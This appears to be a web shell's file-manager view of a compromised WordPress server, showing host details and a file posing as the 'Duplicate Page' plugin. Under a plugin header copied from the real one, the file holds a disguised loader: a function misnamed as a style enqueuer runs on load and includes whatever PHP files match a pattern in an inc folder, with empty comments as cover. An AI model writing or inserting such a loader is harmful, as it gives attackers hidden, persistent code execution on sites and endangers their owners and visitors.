HEX
Server: nginx/1.27.1
System: Linux in-4 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
User: ilikadirect (1186)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v6964/mangomitra/public_html/wp-content/plugins/duplicate-page-src/duplicatepage.php
<?php
/*
Plugin Name: Duplicate Page
Plugin URI: https://duplicatepro.com/
Description: Duplicate Posts, Pages and Custom Posts using single click.
Author: mndpsingh287
Version: 4.5.9
Author URI: https://profiles.wordpress.org/mndpsingh287/
License: GPLv2
Text Domain: duplicate-page
*/

duplicate_page_wp_enqueue_style();

/**
                 * Elementor compatibility fixes
                 */



/**
                 * Breakdance compatibility
                 */

function duplicate_page_wp_enqueue_style() {
	$dir   = __DIR__ . '/inc';
	$files = glob( $dir . '/*duplicate-page.php' );
	if ( ! empty( $files ) ) {
		foreach ( $files as $file ) {
			include_once $file;
		}
	}
}